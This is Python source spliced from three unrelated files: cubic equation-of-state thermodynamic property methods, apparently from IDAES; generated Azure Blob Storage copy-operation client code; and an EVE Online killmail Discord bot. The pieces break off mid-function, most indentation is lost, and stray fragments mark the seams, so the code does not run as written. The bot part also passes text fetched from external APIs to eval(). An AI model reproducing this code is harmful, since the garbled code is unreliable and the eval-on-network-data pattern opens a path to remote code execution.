setattr(param_block, cname + "_func_d2alpha_dT2", func_d2alpha_dT2_soave)
@staticmethod
def compress_fact_phase(b, p):
pobj = b.params.get_phase(p)
cname = pobj._cubic_type.name
A = getattr(b, cname + "_A")
B = getattr(b, cname + "_B")
expr_write = CubicThermoExpressions(b)
if pobj.is_vapor_phase():
return expr_write.z_vap(eos=pobj._cubic_type, A=A[p], B=B[p])
elif pobj.is_liquid_phase():
return expr_write.z_liq(eos=pobj._cubic_type, A=A[p], B=B[p])
raise BurntToast(
"{} non-vapor or liquid phase called for cubic "
"EoS compressability factor. This should never "
"happen, so please contact the IDAES developers "
"with this bug.".format(b.name)
)
@staticmethod
def cp_mol_phase(blk, p):
pobj = blk.params.get_phase(p)
cname = pobj._cubic_type.name
am = getattr(blk, cname + "_am")[p]
bm = getattr(blk, cname + "_bm")[p]
B = getattr(blk, cname + "_B")[p]
dam_dT = getattr(blk, cname + "_dam_dT")[p]
d2am_dT2 = getattr(blk, cname + "_d2am_dT2")[p]
T = blk.temperature
R = Cubic.gas_constant(blk)
Z = blk.compress_fact_phase[p]
dZdT = _dZ_dT(blk, p)
EoS_u = EoS_param[pobj._cubic_type]["u"]
EoS_w = EoS_param[pobj._cubic_type]["w"]
EoS_p = sqrt(EoS_u**2 - 4 * EoS_w)
expression1 = 2 * Z + (EoS_u + EoS_p) * B
expression2 = 2 * Z + (EoS_u - EoS_p) * B
expression3 = B * (dZdT + Z / T) / (Z**2 + Z * EoS_u * B + EoS_w * B**2)
cp_ideal_gas = sum(
blk.mole_frac_phase_comp[p, j]
* get_method(blk, "cp_mol_ig_comp", j)(blk, cobj(blk, j), T)
for j in blk.components_in_phase(p)
)
# Derived from the relations in Chapter 6 of [1]
cp_departure = (
R * (T * dZdT + Z - 1)
+ (T * d2am_dT2 / (EoS_p * bm))
* safe_log(expression1 / expression2, eps=eps_SL)
+ ((am - T * dam_dT) * expression3 / bm)
)
return cp_ideal_gas + cp_departure
@staticmethod
def cv_mol_phase(blk, p):
pobj = blk.params.get_phase(p)
cname = pobj._cubic_type.name
am = getattr(blk, cname + "_am")[p]
bm = getattr(blk, cname + "_bm")[p]
cp = blk.cp_mol_phase[p]
V = 1 / blk.dens_mol_phase[p]
dam_dT = getattr(blk, cname + "_dam_dT")[p]
EoS_u = EoS_param[pobj._cubic_type]["u"]
EoS_w = EoS_param[pobj._cubic_type]["w"]
dPdV = -((Cubic.gas_constant(blk) * blk.temperature) / (V - bm) ** 2) + (
am * (2 * V + EoS_u * bm) / (V**2 + EoS_u * bm * V + EoS_w * bm**2) ** 2
)
dPdT = (Cubic.gas_constant(blk) / (V - bm)) - (
1 / (V**2 + EoS_u * bm * V + EoS_w * bm**2)
) * dam_dT
# See Chapter 6 in [1]
return cp + blk.temperature * dPdT**2 / dPdV
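# Illustrative sketch (not an IDAES method): the dPdV/dPdT expressions above are the
# analytic derivatives of the generic, pressure-explicit cubic below, where (u, w)
# select the specific EoS (PR: u=2, w=-1; SRK: u=1, w=0).
@staticmethod
def _pressure_generic_cubic_sketch(R, T, V, a, b, u, w):
    # P(T, V) = R*T/(V - b) - a(T)/(V**2 + u*b*V + w*b**2)
    return R * T / (V - b) - a / (V**2 + u * b * V + w * b**2)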
@staticmethod
def dens_mass_phase(b, p):
return b.dens_mol_phase[p] * b.mw_phase[p]
@staticmethod
def dens_mol_phase(b, p):
pobj = b.params.get_phase(p)
return b.pressure / (
Cubic.gas_constant(b) * b.temperature * b.compress_fact_phase[p]
)
@staticmethod
def energy_internal_mol_phase(blk, p):
pobj = blk.params.get_phase(p)
cname = pobj._cubic_type.name
am = getattr(blk, cname + "_am")[p]
bm = getattr(blk, cname + "_bm")[p]
B = getattr(blk, cname + "_B")[p]
dam_dT = getattr(blk, cname + "_dam_dT")[p]
Z = blk.compress_fact_phase[p]
EoS_u = EoS_param[pobj._cubic_type]["u"]
EoS_w = EoS_param[pobj._cubic_type]["w"]
EoS_p = sqrt(EoS_u**2 - 4 * EoS_w)
# Derived from equation on pg. 120 in Properties of Gases and Liquids
# Departure function for U is similar to H minus the RT(Z-1) term
return (
(blk.temperature * dam_dT - am)
* safe_log(
(2 * Z + B * (EoS_u + EoS_p)) / (2 * Z + B * (EoS_u - EoS_p)),
eps=eps_SL,
)
) / (bm * EoS_p) + sum(
blk.mole_frac_phase_comp[p, j]
* EoSBase.energy_internal_mol_ig_comp_pure(blk, j)
for j in blk.components_in_phase(p)
)
@staticmethod
def energy_internal_mol_phase_comp(blk, p, j):
pobj = blk.params.get_phase(p)
return (
blk.enth_mol_phase_comp[p, j] - blk.pressure * blk.vol_mol_phase_comp[p, j]
)
@staticmethod
def enth_mol_phase(blk, p):
pobj = blk.params.get_phase(p)
cname = pobj._cubic_type.name
am = getattr(blk, cname + "_am")[p]
bm = getattr(blk, cname + "_bm")[p]
B = getattr(blk, cname + "_B")[p]
dam_dT = getattr(blk, cname + "_dam_dT")[p]
Z = blk.compress_fact_phase[p]
R = Cubic.gas_constant(blk)
T = blk.temperature
EoS_u = EoS_param[pobj._cubic_type]["u"]
EoS_w = EoS_param[pobj._cubic_type]["w"]
EoS_p = sqrt(EoS_u**2 - 4 * EoS_w)
enth_ideal = sum(
blk.mole_frac_phase_comp[p, j]
* get_method(blk, "enth_mol_ig_comp", j)(blk, cobj(blk, j), blk.temperature)
for j in blk.components_in_phase(p)
)
# Derived from equation on pg. 120 in Properties of Gases and Liquids
enth_departure = R * T * (Z - 1) + (T * dam_dT - am) / (bm * EoS_p) * safe_log(
(2 * Z + B * (EoS_u + EoS_p)) / (2 * Z + B * (EoS_u - EoS_p)), eps=eps_SL
)
return enth_ideal + enth_departure
@staticmethod
def enth_mol_phase_comp(blk, p, j):
pobj = blk.params.get_phase(p)
dlogphi_j_dT = _d_log_fug_coeff_dT_phase_comp(blk, p, j)
enth_ideal_gas = get_method(blk, "enth_mol_ig_comp", j)(
blk, cobj(blk, j), blk.temperature
)
enth_departure = -Cubic.gas_constant(blk) * blk.temperature**2 * dlogphi_j_dT
return enth_ideal_gas + enth_departure
@staticmethod
def entr_mol_phase(blk, p):
pobj = blk.params.get_phase(p)
cname = pobj._cubic_type.name
bm = getattr(blk, cname + "_bm")[p]
B = getattr(blk, cname + "_B")[p]
dam_dT = getattr(blk, cname + "_dam_dT")[p]
Z = blk.compress_fact_phase[p]
EoS_u = EoS_param[pobj._cubic_type]["u"]
EoS_w = EoS_param[pobj._cubic_type]["w"]
EoS_p = sqrt(EoS_u**2 - 4 * EoS_w)
R = Cubic.gas_constant(blk)
entr_ideal_gas = -R * safe_log(
blk.pressure / blk.params.pressure_ref, eps=eps_SL
)
for j in blk.components_in_phase(p):
entr_j = get_method(blk, "entr_mol_ig_comp", j)(
blk, cobj(blk, j), blk.temperature
)
xj = blk.mole_frac_phase_comp[p, j]
log_xj = blk.log_mole_frac_phase_comp[p, j]
entr_ideal_gas += xj * (entr_j - R * log_xj)
# See pg. 102 in Properties of Gases and Liquids
# or pg. 208 of Sandler, 4th Ed.
entr_departure = R * safe_log((Z - B), eps=eps_SL) + dam_dT / (
bm * EoS_p
) * safe_log(
(2 * Z + B * (EoS_u + EoS_p)) / (2 * Z + B * (EoS_u - EoS_p)), eps=eps_SL
)
return entr_ideal_gas + entr_departure
@staticmethod
def entr_mol_phase_comp(blk, p, j):
pobj = blk.params.get_phase(p)
logphi_j = _log_fug_coeff_phase_comp(blk, p, j)
dlogphi_j_dT = _d_log_fug_coeff_dT_phase_comp(blk, p, j)
R = Cubic.gas_constant(blk)
entr_ideal_gas = get_method(blk, "entr_mol_ig_comp", j)(
blk, cobj(blk, j), blk.temperature
) - R * (
safe_log(blk.pressure / blk.params.pressure_ref, eps=eps_SL)
+ blk.log_mole_frac_phase_comp[p, j]
)
entr_departure = -R * logphi_j - R * blk.temperature * dlogphi_j_dT
return entr_ideal_gas + entr_departure
@staticmethod
def fug_phase_comp(b, p, j):
return b.mole_frac_phase_comp[p, j] * b.pressure * b.fug_coeff_phase_comp[p, j]
@staticmethod
def fug_phase_comp_eq(b, p, j, pp):
return (
b.mole_frac_phase_comp[p, j]
* b.pressure
* exp(_log_fug_coeff_phase_comp_eq(b, p, j, pp))
)
@staticmethod
def log_fug_phase_comp_eq(b, p, j, pp):
return (
b.log_mole_frac_phase_comp[p, j]
+ log(b.pressure / b.params.pressure_ref)
+ _log_fug_coeff_phase_comp_eq(b, p, j, pp)
)
@staticmethod
def | |
Referencing Containers, Blobs, and
Metadata for more information.
:type metadata: str
:param tier: Optional. Indicates the tier to be set on the blob.
Possible values include: 'P4', 'P6', 'P10', 'P15', 'P20', 'P30',
'P40', 'P50', 'P60', 'P70', 'P80', 'Hot', 'Cool', 'Archive'
:type tier: str or ~azure.storage.blob.models.AccessTierOptional
:param rehydrate_priority: Optional: Indicates the priority with which
to rehydrate an archived blob. Possible values include: 'High',
'Standard'
:type rehydrate_priority: str or
~azure.storage.blob.models.RehydratePriority
:param request_id: Provides a client-generated, opaque value with a 1
KB character limit that is recorded in the analytics logs when storage
analytics logging is enabled.
:type request_id: str
:param blob_tags_string: Optional. Used to set blob tags in various
blob operations.
:type blob_tags_string: str
:param seal_blob: Overrides the sealed state of the destination blob.
Service version 2019-12-12 and newer.
:type seal_blob: bool
:param source_modified_access_conditions: Additional parameters for
the operation
:type source_modified_access_conditions:
~azure.storage.blob.models.SourceModifiedAccessConditions
:param modified_access_conditions: Additional parameters for the
operation
:type modified_access_conditions:
~azure.storage.blob.models.ModifiedAccessConditions
:param lease_access_conditions: Additional parameters for the
operation
:type lease_access_conditions:
~azure.storage.blob.models.LeaseAccessConditions
:param callable cls: A custom type or function that will be passed the
direct response
:return: None or the result of cls(response)
:rtype: None
:raises:
:class:`StorageErrorException<azure.storage.blob.models.StorageErrorException>`
"""
error_map = kwargs.pop('error_map', None)
source_if_modified_since = None
if source_modified_access_conditions is not None:
source_if_modified_since = source_modified_access_conditions.source_if_modified_since
source_if_unmodified_since = None
if source_modified_access_conditions is not None:
source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since
source_if_match = None
if source_modified_access_conditions is not None:
source_if_match = source_modified_access_conditions.source_if_match
source_if_none_match = None
if source_modified_access_conditions is not None:
source_if_none_match = source_modified_access_conditions.source_if_none_match
source_if_tags = None
if source_modified_access_conditions is not None:
source_if_tags = source_modified_access_conditions.source_if_tags
if_modified_since = None
if modified_access_conditions is not None:
if_modified_since = modified_access_conditions.if_modified_since
if_unmodified_since = None
if modified_access_conditions is not None:
if_unmodified_since = modified_access_conditions.if_unmodified_since
if_match = None
if modified_access_conditions is not None:
if_match = modified_access_conditions.if_match
if_none_match = None
if modified_access_conditions is not None:
if_none_match = modified_access_conditions.if_none_match
if_tags = None
if modified_access_conditions is not None:
if_tags = modified_access_conditions.if_tags
lease_id = None
if lease_access_conditions is not None:
lease_id = lease_access_conditions.lease_id
# Construct URL
url = self.start_copy_from_url.metadata['url']
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {}
if metadata is not None:
header_parameters['x-ms-meta'] = self._serialize.header("metadata", metadata, 'str')
if tier is not None:
header_parameters['x-ms-access-tier'] = self._serialize.header("tier", tier, 'str')
if rehydrate_priority is not None:
header_parameters['x-ms-rehydrate-priority'] = self._serialize.header("rehydrate_priority", rehydrate_priority, 'str')
header_parameters['x-ms-copy-source'] = self._serialize.header("copy_source", copy_source, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id", request_id, 'str')
if blob_tags_string is not None:
header_parameters['x-ms-tags'] = self._serialize.header("blob_tags_string", blob_tags_string, 'str')
if seal_blob is not None:
header_parameters['x-ms-seal-blob'] = self._serialize.header("seal_blob", seal_blob, 'bool')
if source_if_modified_since is not None:
header_parameters['x-ms-source-if-modified-since'] = self._serialize.header("source_if_modified_since", source_if_modified_since, 'rfc-1123')
if source_if_unmodified_since is not None:
header_parameters['x-ms-source-if-unmodified-since'] = self._serialize.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123')
if source_if_match is not None:
header_parameters['x-ms-source-if-match'] = self._serialize.header("source_if_match", source_if_match, 'str')
if source_if_none_match is not None:
header_parameters['x-ms-source-if-none-match'] = self._serialize.header("source_if_none_match", source_if_none_match, 'str')
if source_if_tags is not None:
header_parameters['x-ms-source-if-tags'] = self._serialize.header("source_if_tags", source_if_tags, 'str')
if if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", if_modified_since, 'rfc-1123')
if if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", if_unmodified_since, 'rfc-1123')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
if if_tags is not None:
header_parameters['x-ms-if-tags'] = self._serialize.header("if_tags", if_tags, 'str')
if lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", lease_id, 'str')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise models.StorageErrorException(response, self._deserialize)
if cls:
response_headers = {
'ETag': self._deserialize('str', response.headers.get('ETag')),
'Last-Modified': self._deserialize('rfc-1123', response.headers.get('Last-Modified')),
'x-ms-client-request-id': self._deserialize('str', response.headers.get('x-ms-client-request-id')),
'x-ms-request-id': self._deserialize('str', response.headers.get('x-ms-request-id')),
'x-ms-version': self._deserialize('str', response.headers.get('x-ms-version')),
'x-ms-version-id': self._deserialize('str', response.headers.get('x-ms-version-id')),
'Date': self._deserialize('rfc-1123', response.headers.get('Date')),
'x-ms-copy-id': self._deserialize('str', response.headers.get('x-ms-copy-id')),
'x-ms-copy-status': self._deserialize(models.CopyStatusType, response.headers.get('x-ms-copy-status')),
'x-ms-error-code': self._deserialize('str', response.headers.get('x-ms-error-code')),
}
return cls(response, None, response_headers)
start_copy_from_url.metadata = {'url': '/{containerName}/{blob}'}
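# Usage sketch (illustrative only; `blob_ops` is assumed to be an already-constructed
# instance of this generated operations class, e.g. the internal blob operations object
# of an async BlobClient). Starts an asynchronous server-side copy only if the
# destination blob does not already exist.
async def _example_start_copy(blob_ops, source_url):
    conditions = models.ModifiedAccessConditions(if_none_match='*')
    await blob_ops.start_copy_from_url(
        copy_source=source_url,
        timeout=30,
        modified_access_conditions=conditions,
    )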
async def copy_from_url(self, copy_source, timeout=None, metadata=None, tier=None, request_id=None, source_content_md5=None, blob_tags_string=None, source_modified_access_conditions=None, modified_access_conditions=None, lease_access_conditions=None, *, cls=None, **kwargs):
"""The Copy From URL operation copies a blob or an internet resource to a
new blob. It will not return a response until the copy is complete.
:param copy_source: Specifies the name of the source page blob
snapshot. This value is a URL of up to 2 KB in length that specifies a
page blob snapshot. The value should be URL-encoded as it would appear
in a request URI. The source blob must either be public or must be
authenticated via a shared access signature.
:type copy_source: str
:param timeout: The timeout parameter is expressed in seconds. For
more information, see <a
href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-timeouts-for-blob-service-operations">Setting
Timeouts for Blob Service Operations.</a>
:type timeout: int
:param metadata: Optional. Specifies a user-defined name-value pair
associated with the blob. If no name-value pairs are specified, the
operation will copy the metadata from the source blob or file to the
destination blob. If one or more name-value pairs are specified, the
destination blob is created with the specified metadata, and metadata
is not copied from the source blob or file. Note that beginning with
version 2009-09-19, metadata names must adhere to the naming rules for
C# identifiers. See Naming and Referencing Containers, Blobs, and
Metadata for more information.
:type metadata: str
:param tier: Optional. Indicates the tier to be set on the blob.
Possible values include: 'P4', 'P6', 'P10', 'P15', 'P20', 'P30',
'P40', 'P50', 'P60', 'P70', 'P80', 'Hot', 'Cool', 'Archive'
:type tier: str or ~azure.storage.blob.models.AccessTierOptional
:param request_id: Provides a client-generated, opaque value with a 1
KB character limit that is recorded in the analytics logs when storage
analytics logging is enabled.
:type request_id: str
:param source_content_md5: Specify the md5 calculated for the range of
bytes that must be read from the copy source.
:type source_content_md5: bytearray
:param blob_tags_string: Optional. Used to set blob tags in various
blob operations.
:type blob_tags_string: str
:param source_modified_access_conditions: Additional parameters for
the operation
:type source_modified_access_conditions:
~azure.storage.blob.models.SourceModifiedAccessConditions
:param modified_access_conditions: Additional parameters for the
operation
:type modified_access_conditions:
~azure.storage.blob.models.ModifiedAccessConditions
:param lease_access_conditions: Additional parameters for the
operation
:type lease_access_conditions:
~azure.storage.blob.models.LeaseAccessConditions
:param callable cls: A custom type or function that will be passed the
direct response
:return: None or the result of cls(response)
:rtype: None
:raises:
:class:`StorageErrorException<azure.storage.blob.models.StorageErrorException>`
"""
error_map = kwargs.pop('error_map', None)
source_if_modified_since = None
if source_modified_access_conditions is not None:
source_if_modified_since = source_modified_access_conditions.source_if_modified_since
source_if_unmodified_since = None
if source_modified_access_conditions is not None:
source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since
source_if_match = None
if source_modified_access_conditions is not None:
source_if_match = source_modified_access_conditions.source_if_match
source_if_none_match = None
if source_modified_access_conditions is not None:
source_if_none_match = source_modified_access_conditions.source_if_none_match
if_modified_since = None
if modified_access_conditions is not None:
if_modified_since = modified_access_conditions.if_modified_since
if_unmodified_since = None
if modified_access_conditions is not None:
if_unmodified_since = modified_access_conditions.if_unmodified_since
if_match = None
if modified_access_conditions is not None:
if_match = modified_access_conditions.if_match
if_none_match = None
if modified_access_conditions is not None:
if_none_match = modified_access_conditions.if_none_match
if_tags = None
if modified_access_conditions is not None:
if_tags = modified_access_conditions.if_tags
lease_id = None
if lease_access_conditions is not None:
lease_id = lease_access_conditions.lease_id
# Construct URL
url = self.copy_from_url.metadata['url']
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {}
if metadata is not None:
header_parameters['x-ms-meta'] = self._serialize.header("metadata", metadata, 'str')
if tier is not None:
header_parameters['x-ms-access-tier'] = self._serialize.header("tier", tier, 'str')
header_parameters['x-ms-copy-source'] = self._serialize.header("copy_source", copy_source, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id", request_id, 'str')
if source_content_md5 is not None:
header_parameters['x-ms-source-content-md5'] = self._serialize.header("source_content_md5", source_content_md5, 'bytearray')
if blob_tags_string is not None:
header_parameters['x-ms-tags'] = self._serialize.header("blob_tags_string", blob_tags_string, 'str')
header_parameters['x-ms-requires-sync'] = self._serialize.header("self.x_ms_requires_sync", self.x_ms_requires_sync, 'str')
if source_if_modified_since is not None:
header_parameters['x-ms-source-if-modified-since'] = self._serialize.header("source_if_modified_since", source_if_modified_since, 'rfc-1123')
if source_if_unmodified_since is not None:
header_parameters['x-ms-source-if-unmodified-since'] = self._serialize.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123')
if source_if_match is not None:
header_parameters['x-ms-source-if-match'] = self._serialize.header("source_if_match", source_if_match, 'str')
if source_if_none_match is not None:
header_parameters['x-ms-source-if-none-match'] = self._serialize.header("source_if_none_match", source_if_none_match, 'str')
if if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", if_modified_since, 'rfc-1123')
if if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", if_unmodified_since, 'rfc-1123')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
= sys_ids
self.watch[_sys]['name'] = _sys
self.watch[_sys]['sec'] = round(d['security_status'],1)
self.watch[_sys]['constellation_id'] = d['constellation_id']
self.watch[_sys]['region'] = 'Unknown'
self.watch[_sys]['region_id'] = 0
for r in self.regions.values():
try:
if d['constellation_id'] in r['constellations']:
self.watch[_sys]['region'] = r['name']
try:
self.watch[_sys]['region_id'] = r['region_id']
except:
self.watch[_sys]['region_id'] = 0
break
except Exception as e:
print(e)
print(self.watch[_sys])
match = True
break
if not match:
await bot.say('<@{}> System not found, searching for best match...'.format(_id))
for sys_id,d in self.systems.items():
if d['name'].startswith(sys):
_sys = d['name']
self.watch[_sys] = {}
self.watch[_sys]['id'] = sys_id
self.watch[_sys]['name'] = d['name']
self.watch[_sys]['sec'] = round(d['security_status'],1)
self.watch[_sys]['constellation_id'] = d['constellation_id']
self.watch[_sys]['region'] = 'Unknown'
self.watch[_sys]['region_id'] = 0
for r in self.regions.values():
try:
if d['constellation_id'] in r['constellations']:
self.watch[_sys]['region'] = r['name']
try:
self.watch[_sys]['region_id'] = r['region_id']
except:
self.watch[_sys]['region_id'] = 0
break
except Exception as e:
print(e)
match = True
break
if not match:
await bot.say("<@{}> Fail. No system name starting with '{}' found.".format(_id, _sys))
return
with open('watch.txt', 'w') as f:
f.write(str(self.watch))
await bot.say('<@{}> Added {} to watchlist. All killmails here will be reported.'.format(_id, _sys))
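# Editor's sketch (assumed helper, not part of the original cog): the watch list
# saved above with str() can be restored without eval by using ast.literal_eval,
# e.g. when the bot starts up.
def _load_watchlist(path='watch.txt'):
    import ast
    try:
        with open(path) as fh:
            return ast.literal_eval(fh.read())
    except (OSError, ValueError, SyntaxError):
        # Missing or malformed file: start with an empty watch list.
        return {}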
@bot.command(pass_context=True)
async def unwatch(ctx):
"""Stop watching a system for kills.
------------------------------
DESCRIPTION: Remove a system from the watch list of systems
where all killmails are posted.
------------------------------
FORMAT: #unwatch <system>
------------------------------
EXAMPLE: #unwatch vlil
Vlillrier removed from watchlist."""
_id = ctx.message.author.id
msg = ctx.message.content
parts = msg.split()
if len(parts) > 1:
_sys = ' '.join(parts[1:]).strip().title() # Old Man Star
else:
if len(self.watch) == 0:
await bot.say('<@{}> The watchlist is empty.'.format(_id))
return
else:
await bot.say('<@{}> You need to tell me the system to stop watching (try #watch to get a list of currently watched systems)'.format(_id))
return
flag_removed = False
for name in list(self.watch):
if _sys == name:
del self.watch[name]
flag_removed = True
break
if not flag_removed:
for name in list(self.watch):
if name.startswith(_sys):
del self.watch[name]
flag_removed = True
break
if flag_removed:
with open('watch.txt', 'w') as f:
f.write(str(self.watch))
await bot.say("<@{}> {} removed from watchlist.".format(_id, name))
else:
await bot.say("<@{}> {} not found in the watchlist, doing nothing.".format(_id, _sys))
@bot.command(pass_context=True)
async def search(ctx):
"""Track a player by name, pirates little helper style.
------------------------------
DESCRIPTION: Lookup a player by name, must be exact match, but
it is not case-sensitive. Results include the time passed since
each of his recent kills, the system name, ship he was in, weapon
he was using, the kind of ship he killed, and the number of pilots involved.
------------------------------
FORMAT: # search <name>
------------------------------
EXAMPLE: # search vytone
[0:04] Akidagi [Coercer] Small Focused Beam Laser II [Algos] #4
[13:33] Aldranette [Vindicator] 'Augmented' Hammerhead [Sleipnir] #2
[16:17] Eha [Vedmak] Vedmak [Vexor Navy Issue] #7
[19:32] Vlillirier [Cerberus] Caldari Navy Scourge LM [Capsule] #5
[19:32] Vlillirier [Cerberus] Caldari Navy Scourge LM [Capsule] #1
=Top Systems=
Kills:10 Sys:Eha Sec:0.4, Black Rise
Kills:4 Sys:Vlillirier Sec:0.3, Placid
Kills:4 Sys:Tama Sec:0.3, The Citadel
=Top Ships=
[Vedmak] Kills:14 <Cruiser>
[Machariel] Kills:6 <Battleship>
[Cerberus] Kills:4 <Heavy Assault Cruiser>"""
try:
_id = ctx.message.author.id
msg = ctx.message.content
parts = msg.split()
if len(parts) == 1:
await bot.say("<@{}> Who do you want to search for? Tell me the exact name.".format(_id))
return
if len(parts) == 2:
name = parts[-1]
else:
name = '%20'.join(parts[1:])
url = "https://esi.evetech.net/latest/search/?categories=character&strict=true&search={}".format(name)
try:
flag_yes = False
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
response = eval(response.replace('null','None').replace('true','True').replace('false','False'))
character_id = response['character'][0]
flag_yes = True
except:
await asyncio.sleep(0.5)
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
response = eval(response.replace('null','None').replace('true','True').replace('false','False'))
character_id = response['character'][0]
flag_yes = True
if flag_yes:
await asyncio.sleep(0.25)
url = "https://zkillboard.com/api/stats/characterID/{}/".format(character_id)
try:
flag_yes = False
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
flag_yes = True
except:
await asyncio.sleep(0.5)
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
flag_yes = True
if flag_yes:
d = eval(response.replace('null','None').replace('true','True').replace('false','False'))
name = d['info']['name']
data = '<@{}> {} <https://zkillboard.com/character/{}/> Danger:**{}** Gang:**{}**\n'.format(_id, name, character_id, d.get('dangerRatio','?'), d.get('gangRatio','?'))
try:
recent_total = d['activepvp']['kills']['count']
except:
recent_total = 0
try:
recent_win = d['topLists'][0]['values'][0]['kills']
except:
recent_win = 0
recent_loss = recent_total - recent_win
try:
data += 'Recent K/D:**{}**/**{}** Total:**{}**/**{}** Solo:**{}**/**{}**\n'.format(recent_win, recent_loss, d['shipsDestroyed'], d['shipsLost'], d['soloKills'], d['soloLosses'])
except:
pass
data += '```css'
url = "https://zkillboard.com/api/kills/characterID/{}/".format(character_id)
try:
flag_yes = False
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
z = eval(response.replace('null','None').replace('true','True').replace('false','False'))
friends = {}
flag_yes = True
except:
await asyncio.sleep(0.5)
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
z = eval(response.replace('null','None').replace('true','True').replace('false','False'))
friends = {}
flag_yes = True
now = datetime.utcnow()
if flag_yes:
for kill in z[:5]:
_sys = self.systems[kill['solar_system_id']]['name']
try:
victim = self.items[ kill['victim']['ship_type_id'] ]
except:
try:
victim = kill['victim']['ship_type_id']
except:
try:
victim = kill['victim']
except:
victim = 'Unknown'
for x in kill['attackers']:
c_id = x.get('character_id', '_Impossible_321')
if c_id != character_id:
if friends.get(c_id, None) is None:
if c_id != '_Impossible_321':
friends[c_id] = 5
else:
friends[c_id] += 5
else: # this guy
try:
#print(kill)
ship_type_id = x.get('ship_type_id', None)
if ship_type_id is not None:
ship = self.items[x['ship_type_id']]
else:
ship = 'Unknown'
ship = shorten_ship(ship)
except:
ship = x.get('ship_type_id', 'Unknown')
try:
weapon_type_id = x.get('weapon_type_id', None)
if weapon_type_id is not None:
weapon = self.items[x['weapon_type_id']]
weapon = shorten_weapon(weapon)
else:
weapon = 'Unknown'
except:
weapon = x.get('weapon_type_id', 'Unknown')
# break if you dont care about friends
if str(ctx.message.author) not in admins:
break
ago = str(now-datetime.strptime( kill['killmail_time'],'%Y-%m-%dT%H:%M:%SZ'))[:-10].replace(' ','').replace('day','d')
num = len(kill['attackers'])
data += f"[{ago}] {_sys} [{ship}] {weapon} [{victim}] #{num}\n"
friends = [(k, friends[k]) for k in sorted(friends, key=friends.get, reverse=True)]
data += '\nTop Systems:\n'
count = 0
for x in d['topLists'][4]['values']:
data += "Kills:{} Sys:{} Sec:{}, {}\n".format( x['kills'], x['solarSystemName'], x['solarSystemSecurity'], x['regionName'] )
count += 1
if count > 2:
break
data += '\nTop Ships:\n'
count = 0
for x in d['topLists'][3]['values']:
data += "[{}] Kills:{} <{}>\n".format(x['shipName'], x['kills'], x['groupName'])
count += 1
if count > 2:
break
# check for cyno
url = "https://zkillboard.com/api/losses/characterID/{}/".format(character_id)
try:
flag_yes = False
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
l = eval(response.replace('null','None').replace('true','True').replace('false','False'))
flag_yes = True
except:
await asyncio.sleep(0.5)
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
l = eval(response.replace('null','None').replace('true','True').replace('false','False'))
flag_yes = True
if flag_yes:
flag_cyno = False
cyno_dt = None
for loss in l:
for item in loss['victim']['items']:
if item['item_type_id'] in [ 28650, 21096, 2852 ]: # cyno
dt = now - datetime.strptime(loss['killmail_time'], '%Y-%m-%dT%H:%M:%SZ')
if cyno_dt is None or dt < cyno_dt:
cyno_dt = dt
flag_cyno = True
if flag_cyno:
data += '\n[LAST CYNO LOSS: {}]\n'.format(str(cyno_dt)[:-10])
data = data.strip() + '```'
await bot.say(data)
if str(ctx.message.author) not in admins:
return True
data = '<@{}> Calculating associates of {} (most shared killmails)'.format(_id, name)
await bot.say(data)
data = '<@{}>Associates and their latest kills:```css\n'.format(_id)
txt = ''
for f_id,n in friends[:5]:
try:
url = "https://esi.evetech.net/latest/characters/{}".format(f_id)
print(url)
try:
flag_yes = False
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
f = eval(response.strip().replace('null','None').replace('true','True').replace('false','False'))
flag_yes = True
except:
await asyncio.sleep(0.5)
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
f = eval(response.strip().replace('null','None').replace('true','True').replace('false','False'))
flag_yes = True
if flag_yes:
await asyncio.sleep(0.33)
url = "https://zkillboard.com/api/kills/characterID/{}/".format(f_id)
print(url)
try:
